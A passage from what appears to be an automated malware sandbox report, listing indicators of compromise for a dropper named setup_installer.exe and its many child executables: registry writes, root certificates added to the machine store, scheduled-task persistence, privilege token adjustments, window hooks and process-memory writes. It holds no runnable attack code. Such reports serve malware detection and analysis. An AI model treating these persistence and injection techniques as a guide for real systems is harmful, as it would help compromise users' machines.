\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" Fri003da4b0a49fa71b6.exe Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" Fri003da4b0a49fa71b6.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" Fri003da4b0a49fa71b6.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" Fri003da4b0a49fa71b6.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Fri0009837acb0e3f.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Fri0009837acb0e3f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2360 schtasks.exe 2736 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 824 Fri009539f6ca3c9b1.exe 352 Fri005fb51f7290280.exe 828 Fri00ea564f2dd.exe 352 Fri005fb51f7290280.exe 2960 powershell.exe 2968 powershell.exe 2552 Fri003da4b0a49fa71b6.exe 348 Fri003da4b0a49fa71b6.exe 348 Fri003da4b0a49fa71b6.exe 348 Fri003da4b0a49fa71b6.exe 348 Fri003da4b0a49fa71b6.exe 348 Fri003da4b0a49fa71b6.exe 2184 powershell.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe 2200 injector.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeCreateTokenPrivilege 2156 Fri0024e24e95c5.exe Token: SeAssignPrimaryTokenPrivilege 2156 Fri0024e24e95c5.exe Token: SeLockMemoryPrivilege 2156 Fri0024e24e95c5.exe Token: SeIncreaseQuotaPrivilege 2156 Fri0024e24e95c5.exe Token: SeMachineAccountPrivilege 2156 Fri0024e24e95c5.exe Token: SeTcbPrivilege 2156 Fri0024e24e95c5.exe Token: SeSecurityPrivilege 2156 Fri0024e24e95c5.exe Token: SeTakeOwnershipPrivilege 2156 Fri0024e24e95c5.exe Token: SeLoadDriverPrivilege 2156 Fri0024e24e95c5.exe Token: SeSystemProfilePrivilege 2156 Fri0024e24e95c5.exe Token: SeSystemtimePrivilege 2156 Fri0024e24e95c5.exe Token: SeProfSingleProcessPrivilege 2156 Fri0024e24e95c5.exe Token: SeIncBasePriorityPrivilege 2156 Fri0024e24e95c5.exe Token: SeCreatePagefilePrivilege 2156 Fri0024e24e95c5.exe Token: SeCreatePermanentPrivilege 2156 Fri0024e24e95c5.exe Token: SeBackupPrivilege 2156 Fri0024e24e95c5.exe Token: SeRestorePrivilege 2156 Fri0024e24e95c5.exe Token: SeShutdownPrivilege 2156 Fri0024e24e95c5.exe Token: SeDebugPrivilege 2156 Fri0024e24e95c5.exe Token: SeAuditPrivilege 2156 Fri0024e24e95c5.exe Token: SeSystemEnvironmentPrivilege 2156 Fri0024e24e95c5.exe Token: SeChangeNotifyPrivilege 2156 Fri0024e24e95c5.exe Token: SeRemoteShutdownPrivilege 2156 Fri0024e24e95c5.exe Token: SeUndockPrivilege 2156 Fri0024e24e95c5.exe Token: SeSyncAgentPrivilege 2156 Fri0024e24e95c5.exe Token: SeEnableDelegationPrivilege 2156 Fri0024e24e95c5.exe Token: SeManageVolumePrivilege 2156 Fri0024e24e95c5.exe Token: SeImpersonatePrivilege 2156 Fri0024e24e95c5.exe Token: SeCreateGlobalPrivilege 2156 Fri0024e24e95c5.exe Token: 31 2156 Fri0024e24e95c5.exe Token: 32 2156 Fri0024e24e95c5.exe Token: 33 2156 Fri0024e24e95c5.exe Token: 34 2156 Fri0024e24e95c5.exe Token: 35 2156 Fri0024e24e95c5.exe Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 2180 Fri00787d8fbee5ae2.exe Token: SeDebugPrivilege 1864 Fri006106b9f3.exe Token: SeDebugPrivilege 2276 taskkill.exe Token: SeDebugPrivilege 1652 taskkill.exe Token: SeDebugPrivilege 2552 Fri003da4b0a49fa71b6.exe Token: SeImpersonatePrivilege 2552 Fri003da4b0a49fa71b6.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeSystemEnvironmentPrivilege 1876 csrss.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2644 iexplore.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 2644 iexplore.exe 2644 iexplore.exe 1352 IEXPLORE.EXE 1352 IEXPLORE.EXE 1352 IEXPLORE.EXE 1352 IEXPLORE.EXE 1900 IEXPLORE.EXE 1900 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2672 wrote to memory of 2804 2672 e44d0cf1c7fec887595324fd936becaaf0829a7a5428922c6ba6640dfb7b3e54.exe 30 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2804 wrote to memory of 2076 2804 setup_installer.exe 31 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2944 2076 setup_install.exe 33 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2076 wrote to memory of 2964 2076 setup_install.exe 34 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2964 wrote to memory of 2960 2964 cmd.exe 36 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2944 wrote to memory of 2968 2944 cmd.exe 35 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2924 2076 setup_install.exe 37 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2912 2076 setup_install.exe 38 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 2916 2076 setup_install.exe 39 PID 2076 wrote to memory of 1532 2076 setup_install.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
